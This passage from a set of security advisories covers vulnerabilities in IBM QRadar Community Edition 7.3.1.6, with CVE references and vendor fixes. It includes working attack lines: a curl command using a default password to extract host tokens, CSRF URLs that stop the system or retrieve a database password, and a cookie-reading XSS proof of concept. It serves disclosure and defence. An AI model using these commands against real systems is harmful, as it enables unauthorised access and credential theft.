only works for the configuration alias as configured in Apache. Recent
versions of QRadar still use the ConfigServices user in other parts of
the web interface. These parts either use a random password (stored in
PostgreSQL) or a so-called host token (via the SEC header or cookie).
However, using the default password it is possible to retrieve the value
of this host token and thus gain access to other parts of QRadar.

curl --insecure --user configservices:qradar -o
/tmp/zipfile_GEN.full.zip
https://<ip>/configuration/zipfile_GEN.full.zip
unzip -p /tmp/zipfile_GEN.full.zip /host_tokens.masterlist | grep
'CONSOLE_HOSTCONTEXT='

------------------------------------------------------------------------
Limitations
------------------------------------------------------------------------
The users.conf configuration file is updated when changes are made to
the user and/or permission configuration of QRadar. The new users.conf
is first written to staging and made effective when the changes to
staging have been deployed. When this happens the password digest of the
configservices user is overwritten with null effectively disabling the
account. Consequently, on larger setups it is likely that changes have
been made to the user/permission configuration and that the default
password will no longer work.

com.q1labs.core.shared.permissions.UserManager:
public class UserManager extends SingletonSupport implements
IMessageListener {
[...]

/**
 * Regenerates the staged users.conf from the currently staged user list.
 *
 * One colon-separated record per staged user is written to
 * {@code CONFIGSERVICES_ROOT + STAGED_CONFIG_FILENAME}. The second field
 * (the password digest slot) is always emitted as the literal {@code null};
 * as the advisory notes, this is why deploying a user/permission change
 * overwrites any pre-seeded digest for the configservices entry and
 * disables password login for it. Any failure is logged and swallowed,
 * so the caller is not told that the file was not written.
 */
public void updateConfigurationFile() {
    String configRoot = NVAReader.getProperty("CONFIGSERVICES_ROOT");

    try {
        File stagedFile = new File(configRoot + STAGED_CONFIG_FILENAME);
        StringBuffer records = new StringBuffer();
        List users = this.getStagedUsers();

        for (Object entry : users) {
            User user = (User) entry;
            String networkNames = PermissionsManager.getNetworkNames(user);
            String userRoleName = PermissionsManager.getUserRoleName(user);
            // An unset locale/timezone is written as an empty field.
            String locale = user.getLocale() == null ? "" : user.getLocale();
            String timezone = user.getTimezone() == null ? "" : user.getTimezone();

            records.append(user.getUserName())
                   .append(":null:") // digest slot: never a real hash
                   .append(networkNames)
                   .append(":")
                   .append(user.getEmail())
                   .append(":")
                   .append(userRoleName)
                   .append(":")
                   .append(locale)
                   .append(":")
                   .append(timezone)
                   .append(":\n");
        }

        FileIOUtils.safeWriteBuffer(stagedFile, records);
    } catch (Exception e) {
        // Best-effort: the error is only logged, not propagated.
        this.log.error((Object)("Can't save deployed " + TABLENAME + " to configuration file"), (Throwable)e);
    }

}
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200401/unauthorized-access-to-qradar-configuration-sets-via-default-password.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4269
[3] https://www.ibm.com/support/pages/node/6189711
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management
[12] https://httpd.apache.org/docs/2.4/mod/mod_authn_file.html




QRadar Community Edition 7.3.1.6 Server Side Request Forgery


QRadar Community Edition version 7.3.1.6 has an issue where the RssFeedItem class of the QRadar web application is used to fetch and parse RSS feeds. No validation is performed on the user-supplied RSS feed URL. Due to the lack of URL validation (whitelisting), it is possible for authenticated attackers to execute Server-Side Request Forgery attacks. Using this issue it is possible to call the Apache Axis AdminService webservice in order to execute arbitrary code with the privileges of the Tomcat user.


MD5 | de790813f9ae985ff869c69760705113

------------------------------------------------------------------------
QRadar RssFeedItem Server-Side Request Forgery vulnerability
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The RssFeedItem class of the QRadar web application is used to fetch and
parse RSS feeds. No validation is performed on the user-supplied RSS
feed URL. Due to the lack of URL validation (whitelisting), it is
possible for authenticated attackers to execute Server-Side Request
Forgery attacks. Using this issue it is possible to call the Apache Axis
AdminService webservice in order to execute arbitrary code with the
privileges of the Tomcat user.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4294 [2]
6189663 [3] - IBM QRadar SIEM is vulnerable to Server-Side Request
Forgery (SSRF) (CVE-2020-4294)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRadar in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The RssFeedItem class of the QRadar web application is used to fetch and
parse (and cache) RSS feeds. The class is exposed in the JSON-RPC
interface via the qradar.getRssFeedItem method. This method can be
called by any authenticated user, no special privileges are required.
RSS feeds are fetched using the Apache Commons HttpClient class, no
validation is performed on the user-supplied URL. Due to the lack of URL
validation (whitelisting), it is possible for authenticated attackers to
execute Server-Side Request Forgery attacks.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Authenticated users can trigger the Server-Side Request Forgery
vulnerability by making a JSON-RPC call with the method set to
qradar.getRssFeedItem. This call is mapped to
com.q1labs.qradar.ui.dashboard.RssFeedItem.getRssFeedItem() and takes
one parameter named feedURL. Any valid URL can be passed to this method.

com.q1labs.qradar.ui.dashboard.RssFeedItem:
public class RssFeedItem extends DashboardItem {
[...]

public static DashboardItem getRssFeedItem(PageContext pageContext, String feedURL) throws Exception {
sessionContext = RequestUtils.getSessionContext((HttpServletRequest)pageContext.getRequest());
RssFeedItem cachedItem = (RssFeedItem)feedCache.get(feedURL);
cachedItem = null;
if (cachedItem == null || System.currentTimeMillis() - cachedItem.lastUpdateTime >= 600000L) {
cachedItem = new RssFeedItem(pageContext, feedURL);
feedCache.put(feedURL, cachedItem);
}

return cachedItem;
}

No validation is done on the user-supplied URL; it is passed directly to
HttpClient, which will try to make a GET request to this URL. This
behavior allows for Server-Side Request Forgery. The returned HTTP
response is parsed as an RSS feed. If the response isn't a valid RSS
feed, an error is returned to the user. Due to this it is not possible
to read the HTTP response (the issue is a blind SSRF), however the GET
request is still executed. By abusing this vulnerability it is possible
for an authenticated attacker to make GET requests to services that are
normally not accessible, including webservices of QRadar that can only
be accessed from the local machine.

com.q1labs.qradar.ui.dashboard.RssFeedItem:
public RssFeedItem(PageContext pageContext, String rssURLString) {
GetMethod getMethod = null;
Locale locale = LocaleUtil.getLocale((HttpServletRequest)pageContext.getRequest());

try {
getMethod = new GetMethod(rssURLString);
HttpClient client = new HttpClient();
ISessionContext sessionContext = RequestUtils.getSessionContext((HttpServletRequest)pageContext.getRequest());
UIAutoupdateService autoupdateService = UIAutoupdateService.getInstance();
String proxyHost = autoupdateService.getSetting(sessionContext, "proxy_server");
String proxtPortString = autoupdateService.getSetting(sessionContext, "proxy_port");
int proxyPort;

[...]

try {
proxyPort = client.executeMethod(getMethod);
this.log.debug("Proxy request successful.");
} catch (Exception var29) {
this.log.warn("Proxy request failed. Falling back to default HTTP request.");
if (StringUtils.isNotEmpty(client.getHostConfiguration().getProxyHost())) {
client = new HttpClient();
proxyPort = client.executeMethod(getMethod);
}
}

The QRadar web application is deployed with Apache Axis [12] version 1.2
to expose a number of SOAP services. The AdminService webservice is
enabled, which allows deploying and undeploying of webservices. The
enableRemoteAdmin option is set to false, meaning that the webservice
can only be called from localhost. Because the forged request originates
from the QRadar host itself, and Axis also accepts service invocations
via plain GET requests, the GET-only Server-Side Request Forgery
primitive is sufficient to call the AdminService webservice and execute
arbitrary code.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200402/qradar-rssfeeditem-server-side-request-forgery-vulnerability.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4294
[3] https://www.ibm.com/support/pages/node/6189663
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management
[12] http://axis.apache.org/




QRadar Community Edition 7.3.1.6 CSRF / Weak Access Control


QRadar Community Edition version 7.3.1.6 suffers from cross site request forgery and weak access control vulnerabilities.


MD5 | c78a8cc9951bc948028d5c3082e91a0f

------------------------------------------------------------------------
Cross-Site Request Forgery & weak access control in QRadar
ConfigServices webservice
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The QRadar web application is deployed with Apache Axis to expose a
number of SOAP services. No measures have been implemented in Axis
and/or QRadar to prevent Cross-Site Request Forgery attacks against
these webservices. Due to this it is possible for an attacker to call
any exposed service via Cross-Site Request Forgery. A successful attack
requires that the attacker tricks/forces a logged in victim to visit the
attacker's specially crafted URL.

Besides the lack of Cross-Site Request Forgery protection, most methods
also lack proper access control checks. A handful of these methods
perform some form of access control, but most methods can be called by
any authenticated user. This could for example be used by a logged in
attacker to gain access to sensitive information (eg, login
credentials).

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [2]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM reports that Apache Axis is no longer used and therefore this issue
has been resolved in upstream builds. In addition, it is stated that
this issue is resolved in QRadar Community Edition version 7.3.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [4] is IBM's enterprise SIEM [5] solution. A free version of
QRadar is available that is known as QRadar Community Edition [2]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar web application is deployed with Apache Axis [6] to expose a
number of SOAP services. By default, Axis allows users to call the SOAP
services via a GET request. The GET request is internally converted to a
SOAP envelope, before it is processed by Axis. No measures have been
implemented in Axis and/or QRadar to prevent Cross-Site Request Forgery
attacks against the webservices exposed by Axis. Due to this it is
possible for an attacker to call any exposed service via Cross-Site
Request Forgery. A successful attack requires that the attacker
tricks/forces a logged in victim to visit the attacker's specially
crafted URL.

Besides the lack of Cross-Site Request Forgery protection, most methods
also lack proper access control checks. A handful of these methods
perform some form of access control, but most methods can be called by
any authenticated user. This could for example be used by a logged in
attacker to gain access to sensitive information.

By calling the getNvaProperty() method, it is possible to retrieve any
'NVA' configuration setting. Sensitive settings, like passwords, are
stored encrypted, however there is also a getDecrypted() method that
allows these values to be decrypted. Some passwords are reused for
different services, which also allows users to elevate their own
privileges. For example, the property jpa.connection.password is used
for connecting to PostgreSQL, but is also used as the password for the
ConfigServices account.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Apache Axis provides a SOAP implementation, services can be configured
in various ways. In case of QRadar the services are configured in the
server-config.wsdd file, located under WEB-INF. Three service classes
are currently configured:

- AdminService
- Version
- configservices

The first two are distributed with Axis, the latter one is custom for
QRadar. The AdminService allows for deploying and undeploying of
webservices, however it is configured to only be accessible from
localhost.

The implementation of the configservices webservice can be found in the
class com.q1labs.configservices.core.ConfigurationServices. Any public
method in this class can be called through Axis. The webservice is
mapped to the path /console/services/configservices. There are two ways
to call these methods:

- POST request containing a SOAP envelope. The first tag in the SOAP
body should have the same name as the method that needs to be invoked.
Method parameters are provided as child elements within this tag.
- GET request; the URL parameters are converted into a SOAP message by
Axis. The method is provided via the method URL parameter, its arguments
are provided as URL parameter with the same name as the method
argument.

No measures have been implemented in Axis and/or QRadar to prevent
Cross-Site Request Forgery attacks against the webservices exposed by
Axis. Due to this it is possible for an attacker to call any exposed
service via Cross-Site Request Forgery. Methods that can be called
include:

- saveScannerConfigFile(data)
- addManagedHost(ipAddress, password, isTunneled, isCompressed, ipPublicAddress, natId, consoleIpToUse, runPrecheck, remappingip)
- startComponent/stopComponent/restartComponent(host, type, componentName)
- startComponents/stopComponents/restartComponents(host)
- startSystem/stopSystem/restartSystem()
- injectDeploymentModel/saveDeploymentModelToStaging(deploymentModel)
- deployStagingConfiguration(fullDeploy)
- restoreFromBackupDeployment()
- saveFile(fileName, data)

An attacker can create a URL that, when visited by a logged in target,
executes one or more of the exposed methods. Because the invocation is
a plain GET request, a link or an embedded image pointing at the URL is
sufficient to trigger it. For example:

https://<ip>/console/services/configservices?method=stopSystem

Besides the lack of Cross-Site Request Forgery protection, most methods
also lack proper access control checks. Only a handful of these methods
perform some form of access control - for example the saveFile() and
retrieveFile() methods check if the logged on user has permission to
write or access the requested file - but most methods can be called by
any authenticated user.

com.q1labs.configservices.core.ConfigurationServices:
public byte[] retrieveFile(String fileName, boolean staging) throws
ConfigServicesFault {
try {
if (!fileName.contains("/") && !fileName.contains("\\")) {
String qradarUsername = this.requestSession.getQradarUsername();
boolean canAccess = RequestSession.hasPermission(qradarUsername);
if (!canAccess) {
throw new UnauthorizedException("Provided username from security token does not have permission to use this method");
[...]

A logged on attacker can call all methods that lack proper access
control. One notable attack is to call the getNvaProperty() method. By
calling this method it is possible to retrieve any 'NVA' configuration
setting - including sensitive information like (encrypted) credentials.
Credentials are stored encrypted on disk, but in some cases they are
held decrypted in memory. If they are already decrypted,
getNvaProperty() will return the plaintext value. If they are still
encrypted they can easily be decrypted by calling the getDecrypted()
method of the same webservice.

Some passwords are reused for different services, which allows users to
elevate their own privileges. For example, the property
jpa.connection.password is used for connecting to PostgreSQL, but is
also used as the password for the ConfigServices account. A low
privileged user can request the password for the PostgreSQL user. Since
PostgreSQL is normally not exposed over the network it would still not
be possible to log in. However due to the password reuse it is possible
to use the same password to login as the ConfigService user.

https://<ip>/console/services/configservices?method=getNvaProperty&key=jpa.connection.password

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200403/cross-site-request-forgery-_-weak-access-control-in-qradar-configservices-webservice.html
[2] https://developer.ibm.com/qradar/ce/
[3] https://www.ibm.com/account/reg/us-en/signup?formid=urx-32552
[4] https://www.ibm.com/security/security-intelligence/qradar
[5] https://en.wikipedia.org/wiki/Security_information_and_event_management
[6] http://axis.apache.org/




QRadar Community Edition 7.3.1.6 Cross Site Scripting


QRadar Community Edition version 7.3.1.6 suffers from a reflective cross site scripting vulnerability in the Forensics link analysis page.


MD5 | fe186d0de8d1507e14a349eb48108ff7

------------------------------------------------------------------------
Reflected Cross-Site Scripting in QRadar Forensics link analysis page
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The QRadar Forensics PHP web application contains a page that is
vulnerable to reflected Cross-Site Scripting. This issue exists due to
the lack of encoding of the single-quote character and can be triggered
without authentication.

This vulnerability allows an attacker to perform a wide variety of
actions such as performing arbitrary actions on the victim's behalf or
presenting a fake login screen to collect usernames and passwords. In
order to exploit this issue, the attacker has to lure a victim into
opening a specially crafted link and pressing a key combination - making
a successful attack less likely.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [2]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM reports that QRadar 7.3.2 Patch 6 is not affected by this
vulnerability. In addition, it is stated that this issue is resolved in
QRadar Community Edition version 7.3.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [4] is IBM's enterprise SIEM [5] solution. A free version of
QRadar is available that is known as QRadar Community Edition [2]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar Forensics PHP web application contains a page that is
vulnerable to reflected Cross-Site Scripting. This issue exists due to
the lack of encoding of the single-quote character and can be triggered
without authentication.

This vulnerability allows an attacker to perform a wide variety of
actions such as performing arbitrary actions on the victim's behalf or
presenting a fake login screen to collect usernames and passwords. In
order to exploit this issue, the attacker has to lure a victim into
opening a specially crafted link and pressing a key combination - making
a successful attack less likely.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the LinkAnalysis.php page, located in
/opt/ibm/forensics/html/DejaVu/. The page accepts three request
parameters that are reflected in hidden input fields. Their values are
then used to open a new window to load the LinkAnalysisServlet Servlet.
The page itself appears to be old unused code, however it is still
exposed.

/opt/ibm/forensics/html/DejaVu/LinkAnalysis.php:
<?php

$solrQuery = htmlentities($_REQUEST['solrQuery']); // e.g., ID:*
$solrDocs = htmlentities($_REQUEST['solrDocs']); // e.g.,
case1-aljazeera_net2.pcap-0800278d2a7a-20080501224316017-1-2, et al.
$solrRows = htmlentities($_REQUEST['solrRows']); // e.g., 1024

$SERVER_NAME = $_SERVER['SERVER_NAME'];

$servletURL = 'http://' . $SERVER_NAME . ':8080/LinkAnalysisServlet';
$solrURL = 'http://' . $SERVER_NAME . ':8080/solr/documents';

print "
[...]
<input id='solrQuery' value='$solrQuery' hidden></input>
<input id='solrDocs' value='$solrDocs' hidden></input>
<input id='solrRows' value='$solrRows' hidden></input>
<script>
var solrQuery = document.getElementById('solrQuery').value;
var solrDocs = document.getElementById('solrDocs').value;
var solrRows = document.getElementById('solrRows').value;

window.onload = function() {
window.open('$servletURL?solrURL=$solrURL&solrQuery='+solrQuery+'&solrDocs='+solrDocs+'&solrRows='+solrRows', '_self')
}
</script>
[...]

The code above uses the htmlentities() [6] function to escape HTML
characters. The flags argument is not provided, so the default
(ENT_COMPAT) applies: it encodes double quotes but leaves the
single-quote character unencoded. ENT_QUOTES would be required to
encode both quote characters.

The values of the request parameters are reflected between single-quotes
and consequently it is possible to break out of the value attribute and
inject additional attributes in the hidden input field. It isn't
possible to inject other HTML tags as the greater-than and less-than
characters are encoded by htmlentities().

Exploiting Cross-Site Scripting vulnerabilities within hidden fields can
be a bit tricky. A method has been described by Gareth Heyes [7] in the
article XSS in hidden input fields [8]. Essentially it requires that the
victim is enticed to press a certain key combination (bound via an
injected accesskey attribute). This behavior is also browser [9] and OS
dependent. As the attacker also needs to lure a victim into opening a
specially crafted link, exploiting this issue may prove to be difficult.

This issue can be demonstrated using the proof of concept below. When
loading this URL in Firefox, the victim needs to press Alt+Shift+X
(Windows/Linux) or Ctrl+Alt+X (macOS).

https://<ip>/forensics/DejaVu/LinkAnalysis.php?solrQuery=%27%20accesskey=X%20onclick=%27alert(document.cookie)

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200404/reflected-cross-site-scripting-in-qradar-forensics-link-analysis-page.html
[2] https://developer.ibm.com/qradar/ce/
[3] https://www.ibm.com/account/reg/us-en/signup?formid=urx-32552
[4] https://www.ibm.com/security/security-intelligence/qradar
[5] https://en.wikipedia.org/wiki/Security_information_and_event_management
[6] https://www.php.net/manual/en/function.htmlentities.php
[7] https://twitter.com/garethheyes
[8] https://portswigger.net/blog/xss-in-hidden-input-fields
[9] https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/accesskey#Browser_compatibility




QRadar Community Edition 7.3.1.6 Insecure File Permissions


QRadar Community Edition version 7.3.1.6 suffers from a local privilege escalation due to insecure file permissions with run-result-reader.sh.


MD5 | 78916b6ddfb832ae9b4373ee1c58da01

------------------------------------------------------------------------
Local privilege escalation in QRadar due to run-result-reader.sh
insecure file permissions
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the nobody user is the owner of the run-result-reader.sh
script. This script is executed by the root user's crontab. Due to this
it is possible for any process running as nobody to add commands to this
script that will be executed with root privileges. In combination with a
code execution vulnerability in QRadar's web application, this can be
used by attackers to gain full control of the QRadar system.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4270 [2]
6189657 [3] - IBM QRadar SIEM is vulnerable to privilege escalation
(CVE-2020-4270)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRadar in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

A local privilege escalation vulnerability was found in QRadar. This
vulnerability is possible because the script located at
/opt/qvm/iem/bin/run-result-reader.sh is configured with weak file
permissions. The owner of the script is set to the nobody user, which is
a low privileged system account used by various services - including
QRadar's web application.

The script is also started by the root user's crontab. This means that
if an attacker manages to gain access to the QRadar system as the nobody
user, it would be possible to escalate privileges to root. This is for
example possible by exploiting a code execution vulnerability in
QRadar's web application.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The crontab of the root user contains various entries to run commands on
different moments. One of these entries will run the
run-result-reader.sh script every 20 minutes:

# crontab -l

[...]

# Update the Endpoint Manager Fixlet Action Results
*/20 * * * * /opt/qvm/iem/bin/run-result-reader.sh > /var/log/iem-cron.log 2>&1

This script is owned by the nobody user, and the mode shown below
(-rwxr-xr-x) grants the owner write access. This user therefore fully
controls the content of the script and thus which commands will be
executed.

# ls -la /opt/qvm/iem/bin/run-result-reader.sh
-rwxr-xr-x 1 nobody nobody 2592 Sep 12 17:40
/opt/qvm/iem/bin/run-result-reader.sh

If the (modified) script is run from root's crontab, the commands within
the script will be executed with root privileges. Due to this it is
possible for the nobody user to exploit this issue to gain root
privileges and full control of the QRadar system.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200405/local-privilege-escalation-in-qradar-due-to-run-result-reader_sh-insecure-file-permissions.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4270
[3] https://www.ibm.com/support/pages/node/6189657
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management





QRadar Community Edition 7.3.1.6 PHP Object Injection


QRadar Community Edition version 7.3.1.6 suffers from a php object injection vulnerability.


MD5 | 829d59fdbec4c7b0c02f591307aaf419

------------------------------------------------------------------------
PHP object injection vulnerability in QRadar Forensics web application
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP object injection vulnerability was found in the QRadar Forensics
web application. The vulnerability can be triggered via a specially
crafted cookie and can be used by an authenticated attacker to execute
arbitrary commands. The commands will be executed with the privileges of
the Apache system user.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4271 [2]
6189651 [3] - IBM QRadar SIEM is vulnerable to PHP object injection
(CVE-2020-4271)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRadar in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

A PHP object injection vulnerability was found in the QRadar Forensics
web application. The vulnerability exists in the DataSetModel class and
can be triggered via a specially crafted cookie. By exploiting this
issue it is possible for authenticated users to instantiate arbitrary
PHP objects. It has been confirmed that a POP chain exists that can be
used to execute arbitrary commands. The commands will be executed with
the privileges of the Apache system user (generally the nobody user).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Forensics web application contains functionality to save graph data
in cookies. When a graph is viewed that was previously saved, the data
will be restored from the cookie value(s). Saving and restoring data is
done using PHP object serialization. The serialized data is compressed
and encoded with base64 before it is returned as a cookie to the user.
The cookie carries no integrity protection (no signature or MAC), so a
user can replace it with arbitrary serialized data; the only check
performed before deserialization is that the combined cookie length
matches the expected size. Deserialization of graph cookies is done in
the restore() method of the DataSetModel as is shown in the code
fragment below.

/opt/ibm/forensics/html/DejaVu/Reports/DataSetModel.php:
public function restore($dataKeys, $dsize) {
if ($dsize == 0)
// No data
return null;

$cookieData = '';
foreach ($dataKeys as $dataKey) {
if (array_key_exists($dataKey, $_COOKIE)) {
